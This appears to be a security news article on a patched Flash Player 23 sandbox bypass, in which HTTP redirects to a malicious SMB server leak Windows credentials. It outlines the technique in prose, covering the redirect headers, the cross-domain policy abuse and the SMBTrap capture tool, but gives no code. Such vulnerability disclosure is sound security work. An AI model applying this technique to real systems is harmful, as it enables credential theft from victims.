Recently patched Flash Player sandbox leaks Windows credentials

According to Dutch security researcher Björn Ruytenberg, the bug is a variant of an old vulnerability, CVE-2016-4271, which Adobe patched in September 2016. That bug could enable hackers to fool users into loading a Flash file that would connect to a remote SMB server and steal Windows credentials.

This new flaw can bypass Adobe’s new security measures in version 23. In a blog post, Ruytenberg said that a hacker could override Adobe’s prevention of Flash making outbound connections to URLs with UNC of file-like paths by loading a Flash file that makes requests to a remote server via HTTP or HTTPS.

“By setting the HTTP Location header and an appropriate response code (eg 301, 302), this vulnerability can be used to redirect HTTP requests to a malicious SMB server,” he said.

In an example, the researcher described a scenario where a malicious Flash application as well as SMB server are hosted on a machine having the same IP address. This Flash application runs on the victim’s local machine in the remote sandbox. That is, the runtime prohibits local file system access but allows remote connections.

“Tracing back to the Win32 API, the functions affected by Redirect-to-SMB reside in urlmon.dll. Hence, Internet Explorer and any third-party applications using them are vulnerable,” he said.

He said that Adobe’s cross-domain policy file, which dictates when a Flash client is allowed to load resources from a different domain other than the originating one, could be abused.

“The careful reader might notice that Adobe’s definition, unlike HTTP CORS (referencing RFC6454), restricts itself to cross-domain data handling. More specifically, it does not take into account differing protocols. This security mechanism should therefore be unrelated to our blocked attack: we are trying to redirect to SMB, a different protocol, on the same host,” he said.

Ruytenberg added that crossdomain.xml is being requested from the same host that serves our Flash application. By constructing a least-restrictive cross-domain policy, the researcher was able to establish an SMB connection from the victim’s machine to a remote server.

From there a Python script called SMBTrap operates as a malicious SMB server, and captures any incoming requests along with the victim’s user credentials.

He added that Firefox as well as Internet Explorer are vulnerable to this kind of attack while Edge and Chrome weren’t. This also applies to all current versions of Microsoft Office. In addition, the flaw affects both remote and local-with-networking sandboxes.

Ruytenberg said that having introduced new input validation measures, Flash Player 23 minimises potential attack vectors by rejecting any outbound requests for non-HTTP URLs.

“Quite unexpectedly, however, input validation is only done once: while the initial HTTP request is validated, consecutive redirects are not. Combined with the fact Flash is still susceptible to a known Windows vulnerability therefore effectively kills a seemingly solid approach. This is unfortunate, and perhaps once again illustrates the underlying problem that platform-specific vulnerabilities need to be taken into account whenever possible,” he said.